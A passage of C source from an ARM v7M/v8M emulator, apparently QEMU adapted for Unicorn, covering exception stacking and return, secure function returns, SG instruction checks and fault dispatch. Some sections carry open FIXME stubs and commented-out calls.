qemu_log_mask(CPU_LOG_INT, "...STKOF during stacking\n"); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_STKOF_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->regs[13] = limit; /* * We won't try to perform any further memory accesses but * we must continue through the following code to check for * permission faults during FPU state preservation, and we * must update FPCCR if lazy stacking is enabled. */ limitviol = true; stacked_ok = false; } } /* * Write as much of the stack frame as we can. If we fail a stack * write this will result in a derived exception being pended * (which may be taken in preference to the one we started with * if it has higher priority). 
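     *
     * (Layout recap, taken from the offsets used below: the basic
     * hardware frame is 0x20 bytes holding r0-r3, r12, lr, the return
     * address and xPSR at 0x00..0x1c; when FP state is stacked, s0-s15
     * follow at 0x20..0x5c with FPSCR at 0x60 for a 0x68-byte frame,
     * and the TS case appends s16-s31 for a 0xa8-byte frame.)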
*/ stacked_ok = stacked_ok && v7m_stack_write(cpu, frameptr, env->regs[0], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 4, env->regs[1], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 8, env->regs[2], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 12, env->regs[3], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 16, env->regs[12], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 20, env->regs[14], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 24, env->regs[15], mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, frameptr + 28, xpsr, mmu_idx, STACK_NORMAL); if (env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK) { /* FPU is active, try to save its registers */ bool fpccr_s = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_S_MASK; bool lspact = env->v7m.fpccr[fpccr_s] & R_V7M_FPCCR_LSPACT_MASK; if (lspact && arm_feature(env, ARM_FEATURE_M_SECURITY)) { qemu_log_mask(CPU_LOG_INT, "...SecureFault because LSPACT and FPCA both set\n"); env->v7m.sfsr |= R_V7M_SFSR_LSERR_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); } else if (!env->v7m.secure && !nsacr_cp10) { qemu_log_mask(CPU_LOG_INT, "...Secure UsageFault with CFSR.NOCP because " "NSACR.CP10 prevents stacking FP regs\n"); armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, M_REG_S); env->v7m.cfsr[M_REG_S] |= R_V7M_CFSR_NOCP_MASK; } else { if (!(env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPEN_MASK)) { /* Lazy stacking disabled, save registers now */ int i; bool cpacr_pass = v7m_cpacr_pass(env, env->v7m.secure, arm_current_el(env) != 0); if (stacked_ok && !cpacr_pass) { /* * Take UsageFault if CPACR forbids access. The pseudocode * here does a full CheckCPEnabled() but we know the NSACR * check can never fail as we have already handled that. */ qemu_log_mask(CPU_LOG_INT, "...UsageFault with CFSR.NOCP because " "CPACR.CP10 prevents stacking FP regs\n"); armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_NOCP_MASK; stacked_ok = false; } for (i = 0; i < ((framesize == 0xa8) ? 32 : 16); i += 2) { uint64_t dn = *aa32_vfp_dreg(env, i / 2); uint32_t faddr = frameptr + 0x20 + 4 * i; uint32_t slo = extract64(dn, 0, 32); uint32_t shi = extract64(dn, 32, 32); if (i >= 16) { faddr += 8; /* skip the slot for the FPSCR */ } stacked_ok = stacked_ok && v7m_stack_write(cpu, faddr, slo, mmu_idx, STACK_NORMAL) && v7m_stack_write(cpu, faddr + 4, shi, mmu_idx, STACK_NORMAL); } stacked_ok = stacked_ok && v7m_stack_write(cpu, frameptr + 0x60, vfp_get_fpscr(env), mmu_idx, STACK_NORMAL); if (cpacr_pass) { for (i = 0; i < ((framesize == 0xa8) ? 32 : 16); i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } } else { /* Lazy stacking enabled, save necessary info to stack later */ v7m_update_fpccr(env, frameptr + 0x20, true); } } } /* * If we broke a stack limit then SP was already updated earlier; * otherwise we update SP regardless of whether any of the stack * accesses failed or we took some other kind of fault. */ if (!limitviol) { env->regs[13] = frameptr; } return !stacked_ok; } static void do_v7m_exception_exit(ARMCPU *cpu) { return; // FIXME CPUARMState *env = &cpu->env; uint32_t excret; uint32_t xpsr, xpsr_mask; bool ufault = false; bool sfault = false; bool return_to_sp_process; bool return_to_handler; bool rettobase = false; bool exc_secure = false; bool return_to_secure; bool ftype; bool restore_s16_s31; /* * If we're not in Handler mode then jumps to magic exception-exit * addresses don't have magic behaviour. 
     * However for the v8M
     * security extensions the magic secure-function-return has to
     * work in thread mode too, so to avoid doing an extra check in
     * the generated code we allow exception-exit magic to also cause the
     * internal exception and bring us here in thread mode. Correct code
     * will never try to do this (the following insn fetch will always
     * fault) so the overhead of having taken an unnecessary exception
     * doesn't matter.
     */
    if (!arm_v7m_is_handler_mode(env)) {
        return;
    }

    /*
     * In the spec pseudocode ExceptionReturn() is called directly
     * from BXWritePC() and gets the full target PC value including
     * bit zero. In QEMU's implementation we treat it as a normal
     * jump-to-register (which is then caught later on), and so split
     * the target value up between env->regs[15] and env->thumb in
     * gen_bx(). Reconstitute it.
     */
    excret = env->regs[15];
    if (env->thumb) {
        excret |= 1;
    }

    qemu_log_mask(CPU_LOG_INT, "Exception return: magic PC %" PRIx32
                  " previous exception %d\n",
                  excret, env->v7m.exception);

    if ((excret & R_V7M_EXCRET_RES1_MASK) != R_V7M_EXCRET_RES1_MASK) {
        qemu_log_mask(LOG_GUEST_ERROR, "M profile: zero high bits in exception "
                      "exit PC value 0x%" PRIx32 " are UNPREDICTABLE\n",
                      excret);
    }

    ftype = excret & R_V7M_EXCRET_FTYPE_MASK;

    if (!ftype && !cpu_isar_feature(aa32_vfp_simd, cpu)) {
        qemu_log_mask(LOG_GUEST_ERROR, "M profile: zero FTYPE in exception "
                      "exit PC value 0x%" PRIx32 " is UNPREDICTABLE "
                      "if FPU not present\n",
                      excret);
        ftype = true;
    }

    if (arm_feature(env, ARM_FEATURE_M_SECURITY)) {
        /*
         * EXC_RETURN.ES validation check (R_SMFL). We must do this before
         * we pick which FAULTMASK to clear.
         */
        if (!env->v7m.secure &&
            ((excret & R_V7M_EXCRET_ES_MASK) ||
             !(excret & R_V7M_EXCRET_DCRS_MASK))) {
            sfault = 1;
            /* For all other purposes, treat ES as 0 (R_HXSR) */
            excret &= ~R_V7M_EXCRET_ES_MASK;
        }
        exc_secure = excret & R_V7M_EXCRET_ES_MASK;
    }

    if (env->v7m.exception != ARMV7M_EXCP_NMI) {
        /*
         * Auto-clear FAULTMASK on return from other than NMI.
         * If the security extension is implemented then this only
         * happens if the raw execution priority is >= 0; the
         * value of the ES bit in the exception return value indicates
         * which security state's faultmask to clear. (v8M ARM ARM R_KBNF.)
         */
        if (arm_feature(env, ARM_FEATURE_M_SECURITY)) {
            // if (armv7m_nvic_raw_execution_priority(env->nvic) >= 0) {
            //     env->v7m.faultmask[exc_secure] = 0;
            // }
        } else {
            env->v7m.faultmask[M_REG_NS] = 0;
        }
    }

#if 0
    switch (armv7m_nvic_complete_irq(env->nvic, env->v7m.exception,
                                     exc_secure)) {
    case -1:
        /* attempt to exit an exception that isn't active */
        ufault = true;
        break;
    case 0:
        /* still an irq active now */
        break;
    case 1:
        /*
         * We returned to base exception level, no nesting.
         * (In the pseudocode this is written using "NestedActivation != 1"
         * where we have 'rettobase == false'.)
         */
        rettobase = true;
        break;
    default:
        g_assert_not_reached();
    }
#endif

    return_to_handler = !(excret & R_V7M_EXCRET_MODE_MASK);
    return_to_sp_process = excret & R_V7M_EXCRET_SPSEL_MASK;
    return_to_secure = arm_feature(env, ARM_FEATURE_M_SECURITY) &&
        (excret & R_V7M_EXCRET_S_MASK);

    if (arm_feature(env, ARM_FEATURE_V8)) {
        if (!arm_feature(env, ARM_FEATURE_M_SECURITY)) {
            /*
             * UNPREDICTABLE if S == 1 or DCRS == 0 or ES == 1 (R_XLCP);
             * we choose to take the UsageFault.
*/ if ((excret & R_V7M_EXCRET_S_MASK) || (excret & R_V7M_EXCRET_ES_MASK) || !(excret & R_V7M_EXCRET_DCRS_MASK)) { ufault = true; } } if (excret & R_V7M_EXCRET_RES0_MASK) { ufault = true; } } else { /* For v7M we only recognize certain combinations of the low bits */ switch (excret & 0xf) { case 1: /* Return to Handler */ break; case 13: /* Return to Thread using Process stack */ case 9: /* Return to Thread using Main stack */ /* * We only need to check NONBASETHRDENA for v7M, because in * v8M this bit does not exist (it is RES1). */ if (!rettobase && !(env->v7m.ccr[env->v7m.secure] & R_V7M_CCR_NONBASETHRDENA_MASK)) { ufault = true; } break; default: ufault = true; } } /* * Set CONTROL.SPSEL from excret.SPSEL. Since we're still in * Handler mode (and will be until we write the new XPSR.Interrupt * field) this does not switch around the current stack pointer. * We must do this before we do any kind of tailchaining, including * for the derived exceptions on integrity check failures, or we will * give the guest an incorrect EXCRET.SPSEL value on exception entry. */ write_v7m_control_spsel_for_secstate(env, return_to_sp_process, exc_secure); /* * Clear scratch FP values left in caller saved registers; this * must happen before any kind of tail chaining. */ if ((env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_CLRONRET_MASK) && (env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK)) { if (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPACT_MASK) { env->v7m.sfsr |= R_V7M_SFSR_LSERR_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...taking SecureFault on existing " "stackframe: error during lazy state deactivation\n"); v7m_exception_taken(cpu, excret, true, false); return; } else { /* Clear s0..s15 and FPSCR */ int i; for (i = 0; i < 16; i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } } if (sfault) { env->v7m.sfsr |= R_V7M_SFSR_INVER_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...taking SecureFault on existing " "stackframe: failed EXC_RETURN.ES validity check\n"); v7m_exception_taken(cpu, excret, true, false); return; } if (ufault) { /* * Bad exception return: instead of popping the exception * stack, directly take a usage fault on the current stack. */ env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVPC_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); qemu_log_mask(CPU_LOG_INT, "...taking UsageFault on existing " "stackframe: failed exception return integrity check\n"); v7m_exception_taken(cpu, excret, true, false); return; } /* * Tailchaining: if there is currently a pending exception that * is high enough priority to preempt execution at the level we're * about to return to, then just directly take that exception now, * avoiding an unstack-and-then-stack. Note that now we have * deactivated the previous exception by calling armv7m_nvic_complete_irq() * our current execution priority is already the execution priority we are * returning to -- none of the state we would unstack or set based on * the EXCRET value affects it. 
*/ // if (armv7m_nvic_can_take_pending_exception(env->nvic)) { // qemu_log_mask(CPU_LOG_INT, "...tailchaining to pending exception\n"); // v7m_exception_taken(cpu, excret, true, false); // return; // } switch_v7m_security_state(env, return_to_secure); { /* * The stack pointer we should be reading the exception frame from * depends on bits in the magic exception return type value (and * for v8M isn't necessarily the stack pointer we will eventually * end up resuming execution with). Get a pointer to the location * in the CPU state struct where the SP we need is currently being * stored; we will use and modify it in place. * We use this limited C variable scope so we don't accidentally * use 'frame_sp_p' after we do something that makes it invalid. */ uint32_t *frame_sp_p = get_v7m_sp_ptr(env, return_to_secure, !return_to_handler, return_to_sp_process); uint32_t frameptr = *frame_sp_p; bool pop_ok = true; ARMMMUIdx mmu_idx; bool return_to_priv = return_to_handler || !(env->v7m.control[return_to_secure] & R_V7M_CONTROL_NPRIV_MASK); mmu_idx = arm_v7m_mmu_idx_for_secstate_and_priv(env, return_to_secure, return_to_priv); if (!QEMU_IS_ALIGNED(frameptr, 8) && arm_feature(env, ARM_FEATURE_V8)) { qemu_log_mask(LOG_GUEST_ERROR, "M profile exception return with non-8-aligned SP " "for destination state is UNPREDICTABLE\n"); } /* Do we need to pop callee-saved registers? */ if (return_to_secure && ((excret & R_V7M_EXCRET_ES_MASK) == 0 || (excret & R_V7M_EXCRET_DCRS_MASK) == 0)) { uint32_t actual_sig; pop_ok = v7m_stack_read(cpu, &actual_sig, frameptr, mmu_idx); if (pop_ok && v7m_integrity_sig(env, excret) != actual_sig) { /* Take a SecureFault on the current stack */ env->v7m.sfsr |= R_V7M_SFSR_INVIS_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...taking SecureFault on existing " "stackframe: failed exception return integrity " "signature check\n"); v7m_exception_taken(cpu, excret, true, false); return; } pop_ok = pop_ok && v7m_stack_read(cpu, &env->regs[4], frameptr + 0x8, mmu_idx) && v7m_stack_read(cpu, &env->regs[5], frameptr + 0xc, mmu_idx) && v7m_stack_read(cpu, &env->regs[6], frameptr + 0x10, mmu_idx) && v7m_stack_read(cpu, &env->regs[7], frameptr + 0x14, mmu_idx) && v7m_stack_read(cpu, &env->regs[8], frameptr + 0x18, mmu_idx) && v7m_stack_read(cpu, &env->regs[9], frameptr + 0x1c, mmu_idx) && v7m_stack_read(cpu, &env->regs[10], frameptr + 0x20, mmu_idx) && v7m_stack_read(cpu, &env->regs[11], frameptr + 0x24, mmu_idx); frameptr += 0x28; } /* Pop registers */ pop_ok = pop_ok && v7m_stack_read(cpu, &env->regs[0], frameptr, mmu_idx) && v7m_stack_read(cpu, &env->regs[1], frameptr + 0x4, mmu_idx) && v7m_stack_read(cpu, &env->regs[2], frameptr + 0x8, mmu_idx) && v7m_stack_read(cpu, &env->regs[3], frameptr + 0xc, mmu_idx) && v7m_stack_read(cpu, &env->regs[12], frameptr + 0x10, mmu_idx) && v7m_stack_read(cpu, &env->regs[14], frameptr + 0x14, mmu_idx) && v7m_stack_read(cpu, &env->regs[15], frameptr + 0x18, mmu_idx) && v7m_stack_read(cpu, &xpsr, frameptr + 0x1c, mmu_idx); if (!pop_ok) { /* * v7m_stack_read() pended a fault, so take it (as a tail * chained exception on the same stack frame) */ qemu_log_mask(CPU_LOG_INT, "...derived exception on unstacking\n"); v7m_exception_taken(cpu, excret, true, false); return; } /* * Returning from an exception with a PC with bit 0 set is defined * behaviour on v8M (bit 0 is ignored), but for v7M it was specified * to be UNPREDICTABLE. 
In practice actual v7M hardware seems to ignore * the lsbit, and there are several RTOSes out there which incorrectly * assume the r15 in the stack frame should be a Thumb-style "lsbit * indicates ARM/Thumb" value, so ignore the bit on v7M as well, but * complain about the badly behaved guest. */ if (env->regs[15] & 1) { env->regs[15] &= ~1U; if (!arm_feature(env, ARM_FEATURE_V8)) { qemu_log_mask(LOG_GUEST_ERROR, "M profile return from interrupt with misaligned " "PC is UNPREDICTABLE on v7M\n"); } } if (arm_feature(env, ARM_FEATURE_V8)) { /* * For v8M we have to check whether the xPSR exception field * matches the EXCRET value for return to handler/thread * before we commit to changing the SP and xPSR. */ bool will_be_handler = (xpsr & XPSR_EXCP) != 0; if (return_to_handler != will_be_handler) { /* * Take an INVPC UsageFault on the current stack. * By this point we will have switched to the security state * for the background state, so this UsageFault will target * that state. */ armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVPC_MASK; qemu_log_mask(CPU_LOG_INT, "...taking UsageFault on existing " "stackframe: failed exception return integrity " "check\n"); v7m_exception_taken(cpu, excret, true, false); return; } } if (!ftype) { /* FP present and we need to handle it */ if (!return_to_secure && (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_LSPACT_MASK)) { armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); env->v7m.sfsr |= R_V7M_SFSR_LSERR_MASK; qemu_log_mask(CPU_LOG_INT, "...taking SecureFault on existing stackframe: " "Secure LSPACT set but exception return is " "not to secure state\n"); v7m_exception_taken(cpu, excret, true, false); return; } restore_s16_s31 = return_to_secure && (env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_TS_MASK); if (env->v7m.fpccr[return_to_secure] & R_V7M_FPCCR_LSPACT_MASK) { /* State in FPU is still valid, just clear LSPACT */ env->v7m.fpccr[return_to_secure] &= ~R_V7M_FPCCR_LSPACT_MASK; } else { int i; uint32_t fpscr; bool cpacr_pass, nsacr_pass; cpacr_pass = v7m_cpacr_pass(env, return_to_secure, return_to_priv); nsacr_pass = return_to_secure || extract32(env->v7m.nsacr, 10, 1); if (!cpacr_pass) { armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, return_to_secure); env->v7m.cfsr[return_to_secure] |= R_V7M_CFSR_NOCP_MASK; qemu_log_mask(CPU_LOG_INT, "...taking UsageFault on existing " "stackframe: CPACR.CP10 prevents unstacking " "FP regs\n"); v7m_exception_taken(cpu, excret, true, false); return; } else if (!nsacr_pass) { armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, true); env->v7m.cfsr[M_REG_S] |= R_V7M_CFSR_INVPC_MASK; qemu_log_mask(CPU_LOG_INT, "...taking Secure UsageFault on existing " "stackframe: NSACR.CP10 prevents unstacking " "FP regs\n"); v7m_exception_taken(cpu, excret, true, false); return; } for (i = 0; i < (restore_s16_s31 ? 32 : 16); i += 2) { uint32_t slo, shi; uint64_t dn; uint32_t faddr = frameptr + 0x20 + 4 * i; if (i >= 16) { faddr += 8; /* Skip the slot for the FPSCR */ } pop_ok = pop_ok && v7m_stack_read(cpu, &slo, faddr, mmu_idx) && v7m_stack_read(cpu, &shi, faddr + 4, mmu_idx); if (!pop_ok) { break; } dn = (uint64_t)shi << 32 | slo; *aa32_vfp_dreg(env, i / 2) = dn; } pop_ok = pop_ok && v7m_stack_read(cpu, &fpscr, frameptr + 0x60, mmu_idx); if (pop_ok) { vfp_set_fpscr(env, fpscr); } if (!pop_ok) { /* * These regs are 0 if security extension present; * otherwise merely UNKNOWN. We zero always. */ for (i = 0; i < (restore_s16_s31 ? 
32 : 16); i += 2) { *aa32_vfp_dreg(env, i / 2) = 0; } vfp_set_fpscr(env, 0); } } } FIELD_DP32(env->v7m.control[M_REG_S], V7M_CONTROL, FPCA, !ftype, env->v7m.control[M_REG_S]); /* Commit to consuming the stack frame */ frameptr += 0x20; if (!ftype) { frameptr += 0x48; if (restore_s16_s31) { frameptr += 0x40; } } /* * Undo stack alignment (the SPREALIGN bit indicates that the original * pre-exception SP was not 8-aligned and we added a padding word to * align it, so we undo this by ORing in the bit that increases it * from the current 8-aligned value to the 8-unaligned value. (Adding 4 * would work too but a logical OR is how the pseudocode specifies it.) */ if (xpsr & XPSR_SPREALIGN) { frameptr |= 4; } *frame_sp_p = frameptr; } xpsr_mask = ~(XPSR_SPREALIGN | XPSR_SFPA); if (!arm_feature(env, ARM_FEATURE_THUMB_DSP)) { xpsr_mask &= ~XPSR_GE; } /* This xpsr_write() will invalidate frame_sp_p as it may switch stack */ xpsr_write(env, xpsr, xpsr_mask); if (env->v7m.secure) { bool sfpa = xpsr & XPSR_SFPA; FIELD_DP32(env->v7m.control[M_REG_S], V7M_CONTROL, SFPA, sfpa, env->v7m.control[M_REG_S]); } /* * The restored xPSR exception field will be zero if we're * resuming in Thread mode. If that doesn't match what the * exception return excret specified then this is a UsageFault. * v7M requires we make this check here; v8M did it earlier. */ if (return_to_handler != arm_v7m_is_handler_mode(env)) { /* * Take an INVPC UsageFault by pushing the stack again; * we know we're v7M so this is never a Secure UsageFault. */ bool ignore_stackfaults; assert(!arm_feature(env, ARM_FEATURE_V8)); armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, false); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVPC_MASK; ignore_stackfaults = v7m_push_stack(cpu); qemu_log_mask(CPU_LOG_INT, "...taking UsageFault on new stackframe: " "failed exception return integrity check\n"); v7m_exception_taken(cpu, excret, false, ignore_stackfaults); return; } /* Otherwise, we have a successful exception exit. */ arm_clear_exclusive(env); arm_rebuild_hflags(env); qemu_log_mask(CPU_LOG_INT, "...successful exception return\n"); } static bool do_v7m_function_return(ARMCPU *cpu) { /* * v8M security extensions magic function return. * We may either: * (1) throw an exception (longjump) * (2) return true if we successfully handled the function return * (3) return false if we failed a consistency check and have * pended a UsageFault that needs to be taken now * * At this point the magic return value is split between env->regs[15] * and env->thumb. We don't bother to reconstitute it because we don't * need it (all values are handled the same way). */ CPUARMState *env = &cpu->env; uint32_t newpc, newpsr, newpsr_exc; qemu_log_mask(CPU_LOG_INT, "...really v7M secure function return\n"); { bool threadmode, spsel; TCGMemOpIdx oi; ARMMMUIdx mmu_idx; uint32_t *frame_sp_p; uint32_t frameptr; /* Pull the return address and IPSR from the Secure stack */ threadmode = !arm_v7m_is_handler_mode(env); spsel = env->v7m.control[M_REG_S] & R_V7M_CONTROL_SPSEL_MASK; frame_sp_p = get_v7m_sp_ptr(env, true, threadmode, spsel); frameptr = *frame_sp_p; /* * These loads may throw an exception (for MPU faults). We want to * do them as secure, so work out what MMU index that is. 
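         *
         * (The two words pulled here are the ones BLXNS pushed on the
         * Secure stack: the true return address at [frameptr] and the
         * saved partial PSR -- exception number plus SFPA -- at
         * [frameptr + 4].)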
*/ mmu_idx = arm_v7m_mmu_idx_for_secstate(env, true); oi = make_memop_idx(MO_LE, arm_to_core_mmu_idx(mmu_idx)); newpc = helper_le_ldul_mmu(env, frameptr, oi, 0); newpsr = helper_le_ldul_mmu(env, frameptr + 4, oi, 0); /* Consistency checks on new IPSR */ newpsr_exc = newpsr & XPSR_EXCP; if (!((env->v7m.exception == 0 && newpsr_exc == 0) || (env->v7m.exception == 1 && newpsr_exc != 0))) { /* Pend the fault and tell our caller to take it */ env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVPC_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); qemu_log_mask(CPU_LOG_INT, "...taking INVPC UsageFault: " "IPSR consistency check failed\n"); return false; } *frame_sp_p = frameptr + 8; } /* This invalidates frame_sp_p */ switch_v7m_security_state(env, true); env->v7m.exception = newpsr_exc; env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; if (newpsr & XPSR_SFPA) { env->v7m.control[M_REG_S] |= R_V7M_CONTROL_SFPA_MASK; } xpsr_write(env, 0, XPSR_IT); env->thumb = newpc & 1; env->regs[15] = newpc & ~1; arm_rebuild_hflags(env); qemu_log_mask(CPU_LOG_INT, "...function return successful\n"); return true; } static bool v7m_read_half_insn(ARMCPU *cpu, ARMMMUIdx mmu_idx, uint32_t addr, uint16_t *insn) { /* * Load a 16-bit portion of a v7M instruction, returning true on success, * or false on failure (in which case we will have pended the appropriate * exception). * We need to do the instruction fetch's MPU and SAU checks * like this because there is no MMU index that would allow * doing the load with a single function call. Instead we must * first check that the security attributes permit the load * and that they don't mismatch on the two halves of the instruction, * and then we do the load as a secure load (ie using the security * attributes of the address, not the CPU, as architecturally required). */ CPUState *cs = CPU(cpu); CPUARMState *env = &cpu->env; V8M_SAttributes sattrs = { 0 }; MemTxAttrs attrs = { 0 }; ARMMMUFaultInfo fi = { 0 }; MemTxResult txres; target_ulong page_size; hwaddr physaddr; int prot; v8m_security_lookup(env, addr, MMU_INST_FETCH, mmu_idx, &sattrs); if (!sattrs.nsc || sattrs.ns) { /* * This must be the second half of the insn, and it straddles a * region boundary with the second half not being S&NSC. */ env->v7m.sfsr |= R_V7M_SFSR_INVEP_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.INVEP\n"); return false; } if (get_phys_addr(env, addr, MMU_INST_FETCH, mmu_idx, &physaddr, &attrs, &prot, &page_size, &fi, NULL)) { /* the MPU lookup failed */ env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_IACCVIOL_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_MEM, env->v7m.secure); qemu_log_mask(CPU_LOG_INT, "...really MemManage with CFSR.IACCVIOL\n"); return false; } #ifdef UNICORN_ARCH_POSTFIX *insn = glue(address_space_lduw_le, UNICORN_ARCH_POSTFIX)(cs->uc, arm_addressspace(cs, attrs), physaddr, #else *insn = address_space_lduw_le(cs->uc, arm_addressspace(cs, attrs), physaddr, #endif attrs, &txres); if (txres != MEMTX_OK) { env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_IBUSERR_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_BUS, false); qemu_log_mask(CPU_LOG_INT, "...really BusFault with CFSR.IBUSERR\n"); return false; } return true; } static bool v7m_handle_execute_nsc(ARMCPU *cpu) { /* * Check whether this attempt to execute code in a Secure & NS-Callable * memory region is for an SG instruction; if so, then emulate the * effect of the SG instruction and return true. 
Otherwise pend * the correct kind of exception and return false. */ CPUARMState *env = &cpu->env; ARMMMUIdx mmu_idx; uint16_t insn; /* * We should never get here unless get_phys_addr_pmsav8() caused * an exception for NS executing in S&NSC memory. */ assert(!env->v7m.secure); assert(arm_feature(env, ARM_FEATURE_M_SECURITY)); /* We want to do the MPU lookup as secure; work out what mmu_idx that is */ mmu_idx = arm_v7m_mmu_idx_for_secstate(env, true); if (!v7m_read_half_insn(cpu, mmu_idx, env->regs[15], &insn)) { return false; } if (!env->thumb) { goto gen_invep; } if (insn != 0xe97f) { /* * Not an SG instruction first half (we choose the IMPDEF * early-SG-check option). */ goto gen_invep; } if (!v7m_read_half_insn(cpu, mmu_idx, env->regs[15] + 2, &insn)) { return false; } if (insn != 0xe97f) { /* * Not an SG instruction second half (yes, both halves of the SG * insn have the same hex value) */ goto gen_invep; } /* * OK, we have confirmed that we really have an SG instruction. * We know we're NS in S memory so don't need to repeat those checks. */ qemu_log_mask(CPU_LOG_INT, "...really an SG instruction at 0x%08" PRIx32 ", executing it\n", env->regs[15]); env->regs[14] &= ~1; env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; switch_v7m_security_state(env, true); xpsr_write(env, 0, XPSR_IT); env->regs[15] += 4; arm_rebuild_hflags(env); return true; gen_invep: env->v7m.sfsr |= R_V7M_SFSR_INVEP_MASK; armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.INVEP\n"); return false; } void arm_v7m_cpu_do_interrupt(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; uint32_t lr; bool ignore_stackfaults; // arm_log_exception(cs->exception_index); /* * For exceptions we just mark as pending on the NVIC, and let that * handle it. */ switch (cs->exception_index) { case EXCP_UDEF: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_UNDEFINSTR_MASK; break; case EXCP_NOCP: { /* * NOCP might be directed to something other than the current * security state if this fault is because of NSACR; we indicate * the target security state using exception.target_el. */ int target_secstate; if (env->exception.target_el == 3) { target_secstate = M_REG_S; } else { target_secstate = env->v7m.secure; } armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, target_secstate); env->v7m.cfsr[target_secstate] |= R_V7M_CFSR_NOCP_MASK; break; } case EXCP_INVSTATE: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_INVSTATE_MASK; break; case EXCP_STKOF: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_STKOF_MASK; break; case EXCP_LSERR: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); env->v7m.sfsr |= R_V7M_SFSR_LSERR_MASK; break; case EXCP_UNALIGNED: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE, env->v7m.secure); env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_UNALIGNED_MASK; break; case EXCP_SWI: /* The PC already points to the next instruction. */ armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SVC, env->v7m.secure); break; case EXCP_PREFETCH_ABORT: case EXCP_DATA_ABORT: /* * Note that for M profile we don't have a guest facing FSR, but * the env->exception.fsr will be populated by the code that * raises the fault, in the A profile short-descriptor format. 
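         *
         * (The low bits tested below distinguish M_FAKE_FSR_NSC_EXEC,
         * a possible SG execution; M_FAKE_FSR_SFAULT, the SecureFault
         * flavours; 0x8, an external abort reported as BusFault; and
         * the default MPU-fault cases reported as MemManage.)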
